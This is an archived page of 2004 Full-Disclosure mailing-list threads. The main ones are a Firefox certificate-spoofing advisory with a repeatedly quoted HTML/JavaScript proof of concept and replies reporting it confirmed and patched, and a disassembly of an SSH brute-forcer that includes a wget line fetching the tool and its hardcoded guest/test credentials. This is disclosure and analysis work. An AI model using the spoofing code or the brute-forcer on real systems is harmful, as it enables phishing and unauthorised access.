
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQBBC2M7yUhSUUBViskRAsRdAJ0b72XJZdYguS7orpztWmcI8l8RXgCgipnp
G089VYAKmAqcmZSQzV6liGE=
=I5HT
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Re: Mozilla Firefox Certificate Spoofing

From: Stephen Samuel (samuelbcgreen.com)
Date: Fri Jul 30 2004 - 22:16:12 CDT

Has this been posted to bugilla????

E.Kellinis wrote:
> #########################################
> Application: Mozilla Firefox
> Vendors: http://www.mozilla.com
> Version: 0.9.1 / 0.9.2
> Platforms: Windows
> Bug: Certificate Spoofing (Phishing)
> Risk: High
> Exploitation: Remote with browser
> Date: 25 July 2004
> Author: Emmanouel Kellinis
> e-mail: mecipher(dot)org(dot)uk
> web: http://www.cipher.org.uk
> List : BugTraq(SecurityFocus)/ Full-Disclosure
> #########################################
>
>
> =======
> Product
> =======
> A popular Web browser,good alternative of IE and
> "The web browser" for linux machines,
> used to view pages on the World Wide Web.
>
> ===
> Bug
> ===
>
> Firefox has caching problem, as a result of that someone can
> spoof a certificate of any website and use it as his/her own.
> The problem is exploited using onunload inside < body> and
> redirection using Http-equiv Refresh metatag,document.write()
> and document.close()
>
> First you direct the redirection metatag to the website
> of which you want to spoof the certificate, then inside
> the < body> tag you add onulnoad script so you can control
> the output inside the webpage with the spoofed certificate.
>
> After that you say to firefox, as soon as you unload this page
> close the stream, aparently the stream you close is
> the redirection website, you do that with
> document.close().
>
> Now you can write anything you want , you do that
> using document.write(). After writing the content of you choice
> you close the stream again , usually firefox wont display your content,
> although if you check the source code you see it , so the last thing
> is to refresh the new page (do that using window.location.reload()),
> after that you have your domain name in the url field , your content
> in the browser and the magic yellow Lock on the bottom left corner,
> if you pass your mouse over it you will see displayed the name of
> the website you spoofed the certificate, if you double click on it you
> will check full information of the certificate without any warning !
>
> You dont need to have SSL in your website ! it will work with
> http.
>
> Additional using this bug malicious websites can bypass content
> filtering using SSL properties.
>
>
> =====================
> Proof Of Concept Code
> =====================
>
> < HTML>
> < HEAD>
> < TITLE>Spoofer< /TITLE>
> < META HTTP-EQUIV="REFRESH" CONTENT="0;URL=https://www.example.com">
> < /HEAD>
> < BODY
> onunload="
> document.close();
> document.writeln('< body onload=document.close();break;>
> < h3>It is Great to Use example's Cert!');
>
> document.close();
> window.location.reload();
> ">
> < /body>
>
>
> =========================================================
> *PK:http://www.cipher.org.uk/files/pgp/cipherorguk.public.key.txt
> =========================================================

--
Stephen Samuel +1(604)876-0426 samuelbcgreen.com
                   http://www.bcgreen.com/~samuel/
    Powerful committed communication. Transformation touching
      the jewel within each person and bringing it to light.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Shaft DDOS

mohrtemerity.net
Date: Fri Jul 30 2004 - 21:35:04 CDT

If you're gonna distribute source code, please ensure that it will compile
with a modern complier!!

I understand that this may have been posted as a historical document (it
is dated from 2000), but really.

My amateurish C isn't advanced enough to fix everything in shaftnode, but
I did try to fix up genstuff & shaftmaster as best I could, and added a
makefile.

On Thu, 29 Jul 2004 phrackcox.net wrote:

> Shaft Denial of Service TOOL
>
> -japboy
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Re: Appliance-based security gateway?

From: Eric Scher (ericschermac.com)
Date: Sat Jul 31 2004 - 07:48:10 CDT

in-reply-to: <20040730233350.2858.80249.MailmanNETSYS.COM>
Mime-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
references: <20040730233350.2858.80249.MailmanNETSYS.COM>
Return-Path: : ericschermac.com

......................................................................................................................................
......................................................................................................................................
......................................................................................................................................

====================================

A few colleagues and I started a discussion as to why
one should or shouldn't buy an appliance-based firewall,
ids/ips or other security appliance instead of installing
software on a server.

We thought about patching, performance, and other
reason for each option but I'd like to hear what other
people think.

I would really appreciate if you could share your
thoughts with me.

Thanks in advance,

Bernardo Santos Wernesback

===================================

Ultimately, anything you place at the edge is going to be an appliance.
Maybe it'll be something by Cisco, perhaps a decommission desktop
running IP Tables, or even one of those fancy new boxes that's supposed
to make life easy for inexperienced admins. It's still essentially an appliance.

But what to use? That's really the essence of the question.

I saw a car show many years ago that was doing a segment waxing,
and the host asked his guest what he recommends.
The guest replied; "Whatever you're actually going to use"
The best wax in the world wont protect your car if it sits on the shelf.
The worst wax WILL protect your car, if it's actualy ON the car.

So for those admins that feel comfortable with something that requires a lot of
interaction, and have the time for it, then one of the more user intensive and complex
choices would be better.

If not, get something that will make your life easier, because a security solution only
secures you when it's being used.

......................................................................................................................................
......................................................................................................................................
......................................................................................................................................

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Security Web Site Hosting

From: CrYpTiC MauleR (crypticmaulerlinuxmail.org)
Date: Sat Jul 31 2004 - 08:22:40 CDT

----- Original Message -----
From: geierhogyros.de (Simon Richter)
Date: Fri, 30 Jul 2004 23:23:08 +0200
To: n30 <n30_listshotmail.com>
Subject: Re: [Full-Disclosure] Security Web Site Hosting

> Hi,
>
> > Any recommendations on site hosting services / Portal framewroks / site
> > builders...
>
> I've heard PHPNuke is pretty solid.
>
> Simon
>
> --
> GPG Fingerprint: 040E B5F7 84F1 4FBC CEAD ADC6 18A0 CC8D 5706 A4B4
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

PHP-Nuke? That is as bad as using IIS. PHP-Nuke has so many XSS, SQL Injection etc vulns found all the time. Unless you want your site hacked dont use that. If at all settling for a 'nuke' CMS use Post-Nuke or CPG-Nuke.

Regards,
CM
--
______________________________________________
Check out the latest SMS services http://www.linuxmail.org
This allows you to send and receive SMS through your mailbox.

Powered by Outblaze

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] [Paper] Designing secure desktop operating system

From: Todd Towles (toddtowlesbrookshires.com)
Date: Sat Jul 31 2004 - 09:14:25 CDT

Fedora Core 2 from Red Hat is free and includes SELinux. Anyone been using
the test release of FC3?

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of Timo Sirainen
Sent: Saturday, July 31, 2004 4:16 AM
To: full-disclosurelists.netsys.com
Cc: secureosprocontrol.fi
Subject: [Full-Disclosure] [Paper] Designing secure desktop operating system

[possibly somewhat off-topic here, secureosprocontrol.fi can be used
for discussion about it]

I've written down some ideas how I think it would be possible to
implement easy to use and quite secure graphical user interface and
operating system around it to make it possible. It's available at
http://iki.fi/tss/security/os.html

Currently I'd be very interested about hearing comments why my ideas
simply wouldn't work with certain kind of software or would be just too
much pain. Or some other fundemental technical problem why this could
never work. Or more positively, people who would be willing to
participate in more complete design or implementation.

To avoid too many replies for issues that are either addressed there or
aren't exactly relevant, please don't reply if you're only going to:

 - suggest using SELinux, Java sandboxes or similar (yes, maybe based on
them, that's not the point)
 - say how sandboxing limits usability and it would never be user-
friendly (it could)
 - say how user-friendliness and security are always mutually exclusive
(they're not)
 - say how it's going to be too difficult to users to keep updating
access control lists to run software they want (it's not needed)
 - confuse operating system with kernel (OS is more than just kernel)
 - say how no matter how "secure" you're trying to be, some people will
always bypass it and hurt themselves/others (yes, it's true for home
users)

I've heard all of those too many times already and I think they're all
answered well enough in the paper.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] FullDisclosure: CWS removal tools

From: RandallM (randallmfidmail.com)
Date: Sat Jul 31 2004 - 09:30:05 CDT

I haven't seen all the threads on this but there is a tool called
CWShredder. It was created to combat CWS. Unfortunetly,
the author was a student and it seems no longer can support it. I just
attempted to find it somewhere else because his links seem down.
At work I use it all the time to clean the computers. Worked wonders. Guess
I'll cherish my tool until it becomes absolete.
I found one link that still works but not sure if it updates anymore.
http://www.aluriasoftware.com/tools/cwshredder.zip . Here
is some other useful links http://www.safer-networking.org/minifiles.html
 
thank you
Randall M
 
 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Cool Web Search Michael: take up the slack!

From: RandallM (randallmfidmail.com)
Date: Sat Jul 31 2004 - 09:58:57 CDT

Michael,
Very interesting that you would say you'd like to do battle. The below link
is a cashed page of the author of
CWShredder/Hijack this who states on his web page (I could only get the
cash version
http://64.233.167.104/search?sourceid=navclient-menuext
<http://64.233.167.104/search?sourceid=navclient-menuext&q=cache:http%3A//ww
w.spywareinfo.com/~merijn/> &q=cache:http%3A//www.spywareinfo.com/~merijn/
Home page unreachable at the moment:
http://www.spywareinfo.com/~merijn/index.html):
 
>>>
June 28, 2004:Alright, this will be my last update for a while. I have a lot
of things going on that are not spyware-related in the next few months and
frankly I find these more important than the spyware-related issues. I'm
sorry if that offends you, but I simply don't have the time to do both at
the same time. I hope you'll understand.

July 1 2004, I will be graduating from the University of Utrecht and receive
my Masters Degree in Science (chemistry, specifically).
September 1 2004, I will start a second study at the same university. I'm
not sure what the English name for this study is (in Dutch it's
Informatiekunde) but it's in the Computer Sciences field.

Right now, my email inbox is overflowing with over 2700 emails which I can't
possibly answer all. These 2700 are two-thirds of about 4000, the remaining
one-third being spam and email viruses which I've already deleted. (For
god's sake people, get some decent antivirus protection, that's nearly 1300
emails from Windows systems infected with email spewing trojans.)
>>>>>>>>>>>>>>>>>>>>>>
 
I'm sure he would have variants and stuff to help you get started.

--__--__--

Message: 34

From: "Schmidt, Michael R." <Michael.SchmidtT-Mobile.com>

To: full-disclosurelists.netsys.com

Subject: RE: [Full-Disclosure] Cool Web Search

Date: Fri, 30 Jul 2004 14:10:30 -0700

I will take up arms to write a cleaner for it. I despise programs like this

Since we are talking about 30 variations does anyone know where a person can
get archived versions of all of these?

I've got a machine and the tools and know how to build the tool. I just need
to be "infected" - wow, 30 variants. That is truly ugly.

Thanks

Michael R. Schmidt

- - - ---------------------------------
thank you
Randall M
 
 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Re: Mozilla Firefox Certificate Spoofing

From: Juan Carlos Navea (loconetgmail.com)
Date: Sat Jul 31 2004 - 09:40:45 CDT

Has anyone tried the proof of concept with a real ssl cert and get it working?

I just tried it using two different ssl urls and the page only
redirected me to the proper site. I did not see the output generated
by document.writeln even after viewing the source.

Can anyone confirm this? I haven't seen any mention of it on bugzilla either.

Im using:

0.9.2 on Windows2k

On Fri, 30 Jul 2004 20:16:12 -0700, Stephen Samuel <samuelbcgreen.com> wrote:
> Has this been posted to bugilla????
>
> E.Kellinis wrote:
> > #########################################
> > Application: Mozilla Firefox
> > Vendors: http://www.mozilla.com
> > Version: 0.9.1 / 0.9.2
> > Platforms: Windows
> > Bug: Certificate Spoofing (Phishing)
> > Risk: High
> > Exploitation: Remote with browser
> > Date: 25 July 2004
> > Author: Emmanouel Kellinis
> > e-mail: mecipher(dot)org(dot)uk
> > web: http://www.cipher.org.uk
> > List : BugTraq(SecurityFocus)/ Full-Disclosure
> > #########################################
> >
> >
> > =======
> > Product
> > =======
> > A popular Web browser,good alternative of IE and
> > "The web browser" for linux machines,
> > used to view pages on the World Wide Web.
> >
> > ===
> > Bug
> > ===
> >
> > Firefox has caching problem, as a result of that someone can
> > spoof a certificate of any website and use it as his/her own.
> > The problem is exploited using onunload inside < body> and
> > redirection using Http-equiv Refresh metatag,document.write()
> > and document.close()
> >
> > First you direct the redirection metatag to the website
> > of which you want to spoof the certificate, then inside
> > the < body> tag you add onulnoad script so you can control
> > the output inside the webpage with the spoofed certificate.
> >
> > After that you say to firefox, as soon as you unload this page
> > close the stream, aparently the stream you close is
> > the redirection website, you do that with
> > document.close().
> >
> > Now you can write anything you want , you do that
> > using document.write(). After writing the content of you choice
> > you close the stream again , usually firefox wont display your content,
> > although if you check the source code you see it , so the last thing
> > is to refresh the new page (do that using window.location.reload()),
> > after that you have your domain name in the url field , your content
> > in the browser and the magic yellow Lock on the bottom left corner,
> > if you pass your mouse over it you will see displayed the name of
> > the website you spoofed the certificate, if you double click on it you
> > will check full information of the certificate without any warning !
> >
> > You dont need to have SSL in your website ! it will work with
> > http.
> >
> > Additional using this bug malicious websites can bypass content
> > filtering using SSL properties.
> >
> >
> > =====================
> > Proof Of Concept Code
> > =====================
> >
> > < HTML>
> > < HEAD>
> > < TITLE>Spoofer< /TITLE>
> > < META HTTP-EQUIV="REFRESH" CONTENT="0;URL=https://www.example.com">
> > < /HEAD>
> > < BODY
> > onunload="
> > document.close();
> > document.writeln('< body onload=document.close();break;>
> > < h3>It is Great to Use example's Cert!');
> >
> > document.close();
> > window.location.reload();
> > ">
> > < /body>
> >
> >
> > =========================================================
> > *PK:http://www.cipher.org.uk/files/pgp/cipherorguk.public.key.txt
> > =========================================================
>
> --
> Stephen Samuel +1(604)876-0426 samuelbcgreen.com
> http://www.bcgreen.com/~samuel/
> Powerful committed communication. Transformation touching
> the jewel within each person and bringing it to light.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

--
http://scott.telnetd.com/loco/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] FullDisclosure: CWS removal tools

From: Todd Towles (toddtowlesbrookshires.com)
Date: Sat Jul 31 2004 - 11:14:12 CDT

Randall, we have discussed CWShredder. The author stopped supporting his
program and did have a list of ever variant on this website and the methods
it used. Very tricky.

He also points out it will not stop the newest version because of the
advanced survival techniques being employed. They are starting to use
roolkit like methods to hide and rebuild if damaged. CWShredder won't get
the new version and neither will any new program.

As far as malware goes, it is a lot of malware around that is never detected
by AV or Anti-spyware software or anything else for that matter.

Sometimes humans are the best countermeasure.

Todd

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of RandallM
Sent: Saturday, July 31, 2004 9:30 AM
To: full-disclosurelists.netsys.com
Subject: [Full-Disclosure] FullDisclosure: CWS removal tools

I haven't seen all the threads on this but there is a tool called
CWShredder. It was created to combat CWS. Unfortunetly,
the author was a student and it seems no longer can support it. I just
attempted to find it somewhere else because his links seem down.
At work I use it all the time to clean the computers. Worked wonders. Guess
I'll cherish my tool until it becomes absolete.
I found one link that still works but not sure if it updates anymore.
http://www.aluriasoftware.com/tools/cwshredder.zip . Here
is some other useful links http://www.safer-networking.org/minifiles.html
 
thank you
Randall M
 
 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Re: Mozilla Firefox Certificate Spoofing

From: Aviv Raff (avivragmail.com)
Date: Sat Jul 31 2004 - 10:59:50 CDT

> Has anyone tried the proof of concept with a real ssl cert and get it working?

Yep.
Try here: http://avivra.europe.webmatrixhosting.net/moz/certspoof1.html

> I just tried it using two different ssl urls and the page only redirected me to the
> proper site. I did not see the output generated by document.writeln even after
> viewing the source.

It works just fine with paypal.

> Can anyone confirm this?

Confirmed. Using FireFox 0.9.2 on XP and Win2k3.

> I haven't seen any mention of it on bugzilla either.

It's probably checked as a security issue, therefore it's not public.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Re: Mozilla Firefox Certificate Spoofing

From: Will Beers (whbeersmbio.ncsu.edu)
Date: Sat Jul 31 2004 - 12:00:11 CDT

I got this working on both windows and linux versions of firefox and
mozilla, it's been submitted and patched.

http://bugzilla.mozilla.org/show_bug.cgi?id=253121

Will Beers

Juan Carlos Navea wrote:
> Has anyone tried the proof of concept with a real ssl cert and get it working?
>
> I just tried it using two different ssl urls and the page only
> redirected me to the proper site. I did not see the output generated
> by document.writeln even after viewing the source.
>
> Can anyone confirm this? I haven't seen any mention of it on bugzilla either.
>
> Im using:
>
> 0.9.2 on Windows2k
>
>
> On Fri, 30 Jul 2004 20:16:12 -0700, Stephen Samuel <samuelbcgreen.com> wrote:
>
>>Has this been posted to bugilla????
>>
>>E.Kellinis wrote:
>>
>>>#########################################
>>>Application: Mozilla Firefox
>>>Vendors: http://www.mozilla.com
>>>Version: 0.9.1 / 0.9.2
>>>Platforms: Windows
>>>Bug: Certificate Spoofing (Phishing)
>>>Risk: High
>>>Exploitation: Remote with browser
>>>Date: 25 July 2004
>>>Author: Emmanouel Kellinis
>>>e-mail: mecipher(dot)org(dot)uk
>>>web: http://www.cipher.org.uk
>>>List : BugTraq(SecurityFocus)/ Full-Disclosure
>>>#########################################
>>>
>>>
>>>=======
>>>Product
>>>=======
>>>A popular Web browser,good alternative of IE and
>>>"The web browser" for linux machines,
>>>used to view pages on the World Wide Web.
>>>
>>>===
>>>Bug
>>>===
>>>
>>>Firefox has caching problem, as a result of that someone can
>>>spoof a certificate of any website and use it as his/her own.
>>>The problem is exploited using onunload inside < body> and
>>>redirection using Http-equiv Refresh metatag,document.write()
>>>and document.close()
>>>
>>>First you direct the redirection metatag to the website
>>>of which you want to spoof the certificate, then inside
>>>the < body> tag you add onulnoad script so you can control
>>>the output inside the webpage with the spoofed certificate.
>>>
>>>After that you say to firefox, as soon as you unload this page
>>>close the stream, aparently the stream you close is
>>>the redirection website, you do that with
>>>document.close().
>>>
>>>Now you can write anything you want , you do that
>>>using document.write(). After writing the content of you choice
>>>you close the stream again , usually firefox wont display your content,
>>>although if you check the source code you see it , so the last thing
>>>is to refresh the new page (do that using window.location.reload()),
>>>after that you have your domain name in the url field , your content
>>>in the browser and the magic yellow Lock on the bottom left corner,
>>>if you pass your mouse over it you will see displayed the name of
>>>the website you spoofed the certificate, if you double click on it you
>>>will check full information of the certificate without any warning !
>>>
>>>You dont need to have SSL in your website ! it will work with
>>>http.
>>>
>>>Additional using this bug malicious websites can bypass content
>>>filtering using SSL properties.
>>>
>>>
>>>=====================
>>>Proof Of Concept Code
>>>=====================
>>>
>>>< HTML>
>>>< HEAD>
>>>< TITLE>Spoofer< /TITLE>
>>>< META HTTP-EQUIV="REFRESH" CONTENT="0;URL=https://www.example.com">
>>>< /HEAD>
>>>< BODY
>>>onunload="
>>>document.close();
>>>document.writeln('< body onload=document.close();break;>
>>> < h3>It is Great to Use example's Cert!');
>>>
>>>document.close();
>>>window.location.reload();
>>>">
>>>< /body>
>>>
>>>
>>>=========================================================
>>>*PK:http://www.cipher.org.uk/files/pgp/cipherorguk.public.key.txt
>>>=========================================================
>>
>>--
>>Stephen Samuel +1(604)876-0426 samuelbcgreen.com
>> http://www.bcgreen.com/~samuel/
>> Powerful committed communication. Transformation touching
>> the jewel within each person and bringing it to light.
>>
>>_______________________________________________
>>Full-Disclosure - We believe in it.
>>Charter: http://lists.netsys.com/full-disclosure-charter.html
>>
>
>
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Re: Mozilla Firefox Certificate Spoofing

From: Peter Besenbruch (prblava.net)
Date: Sat Jul 31 2004 - 12:59:44 CDT

Stephen Samuel wrote:

> Has this been posted to bugilla????
>
>
> E.Kellinis wrote:
>
>> #########################################
>> Application: Mozilla Firefox
>> Vendors: http://www.mozilla.com
>> Version: 0.9.1 / 0.9.2
>> Platforms: Windows
>> Bug: Certificate Spoofing (Phishing)
>> Risk: High
>> Exploitation: Remote with browser
>> Date: 25 July 2004
>> Author: Emmanouel Kellinis
>> e-mail: mecipher(dot)org(dot)uk
>> web: http://www.cipher.org.uk
>> List : BugTraq(SecurityFocus)/ Full-Disclosure
>> #########################################

This was fixed by the July 27 builds in both Firefox 0.9.2( or 1) and
Mozilla 1.7. The Mozilla 1.4 branch was also updated.

Bugzilla report:
http://bugzilla.mozilla.org/show_bug.cgi?id=253121

________________________________________________________________

Hawaiian Astronomical Society: http://www.hawastsoc.org
HAS Deepsky Atlas: http://www.hawastsoc.org/deepsky

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Automated SSH login attempts?

From: Jan Muenther (jan.muenthernruns.com)
Date: Sat Jul 31 2004 - 13:42:33 CDT

Hey Valdis,

> It's more likely that there's one version, making noise and very rarely finding
> a box with stupid passwords. It's possible there's another rare version that
> tries several stupid passwords and a few old SSH vulnerabilities. Is there
> *any* reliable evidence (even a single box) that appears to have been nailed by
> a new exploit?

Hm, as of this frauder binary, I have my strong doubts... looked at it, and
it's a plain brute forcer / banner grabber which is statically linked against
SSH-2.0-libssh-0.1. No magic visible, at least not in the given timeframe, and
my gut feeling is that that's it.

>
> I'll gladly change my mind, but it will take somebody actually finding a
> box running a *recent* SSH and had guest/test/and_so_on properly secured,
> and the attack *still* got in....

I assume in the aforementioned takeovers other factors were involved.

Cheers, J.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Automated SSH login attempts?

From: Jan Muenther (jan.muenthernruns.com)
Date: Sat Jul 31 2004 - 13:36:39 CDT

Hi there,

> Agreed. The thing *is* publicly available, just do 'wget
> frauder.us/linux/ssh.tgz'. What kept me from disassembling the thing so
> far is not availability, but lacking knowledge about the ssh protocol on
> my side ;-)

Hm, actually, there's fairly little of that required to see what this beast
does...
Guys, I can't help but sing the praise of IDA Pro. Get it, it's worth the
money.

> The tool itself dos not need root rights. What needs to be root is the
> portscanner accompanying it.

Yeah, found that too. That, however, is not surprising. It's a SYN-Scanner,
using a detached scanning method, built on libnet (eh, too lazy for raw sockets,
are we) and libpcap, and its statically linked against it. Both binaries
were not stripped by the way :>

You'll need root rights for constructing packets with libnet and root rights
to set the interface into promiscuous mode for the pcap captures.

>
> hehe. According to a brief look at the strace of this thingy, it does
> not do anything suspicious on the local box. But maybe I should have a
> second look - who knows?

Mkay, it really appears to be just an SSH scanner / bruteforcer, which next
to the hardcoded username / password combinations also tries the identity /
public key files of the current user to access other boxes.

Some stuff from the disassembly (label names are mine, function names are from
the binary, as I said, not stripped).

So, it first tries to open uniq.txt for its input, nothing new, and bails out
if it can't:

.text:080482E3 push offset aR ; "r"
.text:080482E8 push offset aUniq_txt ; "uniq.txt"
.text:080482ED call fopen
.text:080482F2 add esp, 10h
.text:080482F5 mov [ebp+var_C], eax
.text:080482F8 cmp [ebp+var_C], 0
.text:080482FC jnz short loc_8048314
.text:080482FE sub esp, 0Ch
.text:08048301 push offset aNuPotDeschideU ; "nu pot deschide
 uniq.txt\n"
.text:08048306 call printf

Is this romanian? Seen it a lot recently...

.text:0804835B do_it: ; CODE XREF: main+86^Xj
.text:0804835B call fork
.text:08048360 test eax, eax
.text:08048362 jnz short loc_80483A6
.text:08048364 sub esp, 4
.text:08048367 lea eax, [ebp+var_418]
.text:0804836D push eax
.text:0804836E push offset aTest ; "test"
.text:08048373 push offset aTest ; "test"
.text:08048378 call ccheckauth
.text:0804837D add esp, 10h
.text:08048380 sub esp, 4
.text:08048383 lea eax, [ebp+var_418]
.text:08048389 push eax
.text:0804838A push offset aGuest ; "guest"
.text:0804838F push offset aGuest ; "guest"
.text:08048394 call ccheckauth
.text:08048399 add esp, 10h
.text:0804839C sub esp, 0Ch
.text:0804839F push 0
.text:080483A1 call exit

Mkay, so, it forks and calls a function called ccheckauth(), giving test and
guest as parameters for the username and password variables of that function.
Once that's done, it exits.

So, here's that function:

text:080481E8 public ccheckauth
.text:080481E8 ccheckauth proc near ; CODE XREF: main+AB^Yp
.text:080481E8 ; main+C7^Yp
.text:080481E8
.text:080481E8 var_14 = dword ptr -14h
.text:080481E8 var_10 = dword ptr -10h
.text:080481E8 var_C = dword ptr -0Ch
.text:080481E8 var_8 = dword ptr -8
.text:080481E8 var_4 = dword ptr -4
.text:080481E8 arg_0 = dword ptr 8
.text:080481E8 arg_4 = dword ptr 0Ch
.text:080481E8 arg_8 = dword ptr 10h
.text:080481E8
.text:080481E8 push ebp
.text:080481E9 mov ebp, esp
.text:080481EB sub esp, 18h
.text:080481EE mov [ebp+var_C], 1
.text:080481F5 mov [ebp+var_10], offset aNone ; "none"
.text:080481FC sub esp, 0Ch
.text:080481FF push 0Fh
.text:08048201 call alarm
.text:08048206 add esp, 10h
.text:08048209 sub esp, 8
.text:08048206 add esp, 10h
.text:08048209 sub esp, 8
.text:0804820C lea eax, [ebp+var_10]
.text:0804820F push eax
.text:08048210 lea eax, [ebp+var_C]
.text:08048213 push eax
.text:08048214 call ssh_getopt
.text:08048219 add esp, 10h
.text:0804821C mov [ebp+var_8], eax
.text:0804821F sub esp, 8
.text:08048222 push [ebp+arg_0]
.text:08048225 push [ebp+var_8]
.text:08048228 call options_set_username
.text:0804822D add esp, 10h
.text:08048230 sub esp, 8
.text:08048233 push [ebp+arg_8]
.text:08048236 push [ebp+var_8]
.text:08048239 call options_set_host
.text:0804823E add esp, 10h
.text:08048241 sub esp, 0Ch
.text:08048244 push [ebp+var_8]
.text:08048247 call ssh_connect
.text:0804824C add esp, 10h
.text:0804824F mov [ebp+var_4], eax
.text:0804824C add esp, 10h
.text:0804824F mov [ebp+var_4], eax
.text:08048252 cmp [ebp+var_4], 0
.text:08048256 jnz short loc_804825A
.text:08048258 jmp short locret_80482CB
.text:0804825A ; ---------------------------------------------------------------
------------

It basically calls a bunch of other functions which do the entire session
setup stuff for the SSH connection attempts. These functions do exactly what
their names imply, so I save the disassemblies here for brevity's sake.

So, there's nothing spectacular here, it's a SSH bruteforcer. One thing though,
it also uses key auth (determines the current user's home dir and looks for
publickey and id files):

.text:08048B90 trykey: ; CODE XREF: ssh_userauth
_autopubkey+F6^Yj
.text:08048B90 sub esp, 8
.text:08048B93 lea eax, [ebp+var_10]
.text:08048B96 push eax
.text:08048B97 lea eax, [ebp+var_14]
.text:08048B9A push eax
.text:08048B9B lea eax, [ebp+var_18]
.text:08048B9E push eax
.text:08048B9F push offset keys_path
.text:08048BA4 push offset pub_keys_path
.text:08048BA9 push edi
.text:08048BAA call publickey_from_next_file
.text:08048BAF add esp, 20h
.text:08048BB2 test eax, eax
.text:08048BAF add esp, 20h
.text:08048BB2 test eax, eax
.text:08048BB4 mov ebx, eax
.text:08048BB6 jz nokeymatch
.text:08048BBC push ebx
.text:08048BBD mov eax, [ebp+var_14]
.text:08048BC0 push eax
.text:08048BC1 push 0
.text:08048BC3 push edi
.text:08048BC4 call ssh_userauth_offer_pubkey
.text:08048BC9 add esp, 10h
.text:08048BCC cmp eax, 0FFFFFFFFh
.text:08048BCF jz cleanupkey
.text:08048BD5 test eax, eax
.text:08048BD7 jnz pubrefused
.text:08048BDD push 0
.text:08048BDF mov eax, [ebp+var_14]
.text:08048BE2 push eax
.text:08048BE3 mov eax, [ebp+var_18]
.text:08048BE6 push eax
.text:08048BE7 push edi
.text:08048BE8 call privatekey_from_file
.text:08048BED add esp, 10h
.text:08048BF0 test eax, eax
.text:08048BED add esp, 10h
.text:08048BF0 test eax, eax
.text:08048BF2 mov esi, eax
.text:08048BF4 jz readprivfail
.text:08048BFA push eax
.text:08048BFB push ebx
.text:08048BFC push 0
.text:08048BFE push edi
.text:08048BFF call ssh_userauth_pubkey
.text:08048C04 add esp, 10h
.text:08048C07 cmp eax, 0FFFFFFFFh
.text:08048C0A jz loc_8048CAA
.text:08048C10 test eax, eax
.text:08048C12 jz short auth_success
.text:08048C14 sub esp, 8
.text:08048C17 push offset aWeirdServerAcc ; "Weird : server
accepted our public key "...
.text:08048C1C push 0
.text:08048C1E call ssh_say
.text:08048C23 mov [esp+38h+var_38], ebx
.text:08048C26 call free
.text:08048C2B mov [esp+38h+var_38], esi
.text:08048C2E call private_key_free

So, yeah, it's a bruteforcer, nothing magic here.

> Right. And somebody volunteered for this job right now, did you? ;-)

Eh. Limited time, new girlfriend is here and it's weekend :-/
So forgive the incompleteness of this :>
Maybe more on monday. FWIW, if there are other versions out, they might be
more interesting than this tool.

Cheers, J.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] Re:

From: Aditya, ALD [Aditya Lalit Deshmukh] (aditya.deshmukhonline.gateway.technolabs.net)
Date: Sun Aug 01 2004 - 01:28:13 CDT

This guy has been sending out viruses unknown to him his machine has been infected... can someone please notify the admin / user of this machine or someone with enough clue to remove this virus for him, ( i would gladly help him / her if her the user was online and was going to trust me but i highly doubt that ),

here are the full headers of the mail....

Return-Path: <full-disclosure-adminlists.netsys.com>
X-Flags: 0000
Delivered-To: nobody.......com
Received: (qmail 8562 invoked by uid 65534); 30 Jul 2004 00:25:28 -0000
X-Priority: 3
X-MSMail-Priority: Normal
Received: from NETSYS.COM (EHLO netsys.com) (199.201.233.10) by mx0.gmx.net (mx060) with SMTP; 30 Jul 2004 02:25:28 +0200
Received: from NETSYS.COM (localhost [127.0.0.1]) by netsys.com (8.11.6p2-2003-09-16/8.11.6) with ESMTP id i6TN67806512; Thu, 29 Jul 2004 19:06:07 -0400 (EDT)
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1409
Received: from arsenio-casa.com ([200.55.20.89]) by netsys.com (8.11.6p2-2003-09-16/8.11.6) with SMTP id i6TN1vj05534 for <full-disclosurelists.netsys.com>; Thu, 29 Jul 2004 19:01:59 -0400 (EDT)
